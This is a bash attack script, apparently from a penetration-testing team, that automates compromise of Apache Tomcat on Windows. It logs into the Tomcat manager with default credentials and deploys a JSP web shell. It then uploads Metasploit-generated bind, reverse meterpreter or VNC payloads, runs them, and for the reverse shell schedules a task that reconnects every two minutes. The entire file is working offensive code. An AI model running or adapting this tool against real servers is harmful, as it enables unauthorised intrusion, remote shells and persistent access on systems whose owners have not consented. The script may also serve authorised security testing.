#!/bin/bash

if [ -z $1 ]
then
printf "[!] Apache Tomcat autopwn win\n[!] Usage: $0 server port\n"
printf "[!] Christian Papathanasiou cpapathanasiou@trustwave.com\n[!] Trustwave SpiderLabs\n"
else

curl --user tomcat:tomcat -F "deployWar=@war/browser-win.war" http://$1:$2/manager/html/upload 2>&1 | grep -i ok 1>/dev/null
curl --user both:tomcat -F "deployWar=@war/browser-win.war" http://$1:$2/manager/html/upload 2>&1 | grep -i ok  1>/dev/null
curl --user role1:tomcat -F "deployWar=@war/browser-win.war" http://$1:$2/manager/html/upload 2>&1 | grep -i ok 1>/dev/null

C=`lynx --dump http://$1:$2/browser-win/browser.jsp | grep 404`

if [ -z "$C" ]
then
printf "[x] Web shell enabled!!: http://$1:$2/browser-win/browser.jsp\n"
else
printf "[!] Failed to deploy browser.jsp."
fi

browsercookie=`printf "GET /browser-win/browser.jsp HTTP/1.1\nHost: $1\n\n" | nc $1 $2 |  grep -i jsession | cut -d: -f2 | cut -d\; -f1`

printf "[x] Server name...:\n"
sed "s/hostx/$1/g" execute/req1-win.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/ipconfig%20\/all/g" | sed -e "s/46/58/g" | nc $1 $2 | grep -i "host" 

printf "[x] Would you like a reverse or bind shell or vnc(bind)? "
read shell
rm -rf payload.exe tmp

if [ $shell == "bind" ]
then
printf "[x] On which port would you like your bindshell to listen? "
read port
msfpayload windows/shell_bind_tcp LPORT=$port X > payload.exe
#R | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -t raw -c 5 | msfencode -e x86/call4_dword_xor -t exe -c 5 >payload.exe 2>/dev/null
printf "[x] Uploading bindshell payload..\n"
curl -F "dir=c:\\" -F "sort=1" -F "name=MyFile" -F "filename=@payload.exe" -F "Submit=Upload" http://$1:$2/browser-win/browser.jsp 1>/dev/null 2>/dev/null
rm -rf payload.exe
printf "[x] Checking that bind shell was uploaded correctly..\n"
sleep 3 
sed "s/hostx/$1/g" execute/req1-win.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/dir%20c:\\\\payload.exe/g" | sed -e "s/46/63/g" | nc $1 $2 2>&1 1>tmp
J=`cat tmp | grep -i payload`
rm -rf tmp
if [ -z "$J" ]
then 
printf "[!] Bindshell failed\n"
else 
printf "[x] Bind shell uploaded: $J\n"
printf "[x] Now executing bind shell...\n"
sed "s/hostx/$1/g" execute/req1-win.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/c:\\\\payload.exe/g" | sed -e "s/46/60/g" | nc $1 $2 1>/dev/null 2>/dev/null  
printf "[x] Executed bindshell!\n"
printf "[x] Reverting to metasploit....\n"
msfcli exploit/multi/handler PAYLOAD=windows/shell_bind_tcp LPORT=$port RHOST=$1 E 
fi
fi

if [ $shell == "reverse" ]
then
myip=`ifconfig -a | grep -i "inet" | cut -d: -f2 | awk '{print $1}' | head -n1`
printf "[x] On which port would you like to accept your reverse shell? "
read port
msfpayload windows/meterpreter/reverse_tcp LHOST=$myip LPORT=$port R | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -t raw -c 5 | msfencode -e x86/call4_dword_xor -t exe -c 5 >payload.exe 
printf "[x] Uploading reverseshell payload..\n"
curl -F "dir=c:\\" -F "sort=1" -F "name=MyFile" -F "filename=@payload.exe" -F "Submit=Upload" http://$1:$2/browser-win/browser.jsp 1>/dev/null 2>/dev/null
rm -rf payload.exe
printf "[x] Checking that the reverse shell was uploaded correctly..\n"
sleep 3
sed "s/hostx/$1/g" execute/req1-win.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/dir%20c:\\\\payload.exe/g" | sed -e "s/46/63/g" | nc $1 $2 2>&1 1>tmp
J=`cat tmp | grep -i payload`
rm -rf tmp
if [ -z "$J" ]
then
printf "[!] Reverse shell failed\n"
else
printf "[x] Reverse shell uploaded: $J\n"
sed "s/hostx/$1/g" execute/move.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" |  nc $1 $2 1>/dev/null 2>/dev/null 
printf "[x] Scheduling reverse shell to run every 2 minutes\n"
timer=`sed "s/hostx/$1/g" execute/schtasks.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" |  nc $1 $2 | grep -i success`
if [ -z "$timer" ]
then
printf "[!] Schtasks failed..\n"
else
printf "[x] Succesfully created schtasks expect a reverse shell every two minutes.\n"
printf "[!] Do not forget to delete the schtasks with: schtasks /tn sqlhost /delete /f\n"
printf "[!] Now run: msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$myip LPORT=$port E and expect a shell in 2 minutes..\n"
fi
fi
fi



if [ $shell == "vnc" ]
then
printf "[x] On which port would you like your  vnc shell to listen? "
read port
msfpayload windows/vncinject/bind_tcp LPORT=$port X>payload.exe
#R | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -t raw -c 5 | msfencode -e x86/call4_dword_xor -t exe -c 5 >payload.exe
printf "[x] Uploading vnc  shell payload..\n"
curl -F "dir=c:\\" -F "sort=1" -F "name=MyFile" -F "filename=@payload.exe" -F "Submit=Upload" http://$1:$2/browser-win/browser.jsp 1>/dev/null 2>/dev/null
rm -rf payload.exe
printf "[x] Checking that vnc shell was uploaded correctly..\n"
sleep 3
sed "s/hostx/$1/g" execute/req1-win.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/dir%20c:\\\\payload.exe/g" | sed -e "s/46/63/g" | nc $1 $2 2>&1 1>tmp
J=`cat tmp | grep -i payload`
rm -rf tmp
if [ -z "$J" ]
then
printf "[!] vnc shell failed\n"
else
printf "[x] vnc shell uploaded: $J\n"
printf "[x] Now executing vnc  shell...\n"
sed "s/hostx/$1/g" execute/req1-win.tomcat | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed -e "s/dir/c:\\\\payload.exe/g" | sed -e "s/46/60/g" | nc $1 $2 1>/dev/null 2>/dev/null
printf "[x] Executed  vnc shell!\n"
printf "[x] Reverting to metasploit....\n"
msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=$port RHOST=$1 DisableCourtesyShell=TRUE E
fi
fi

fi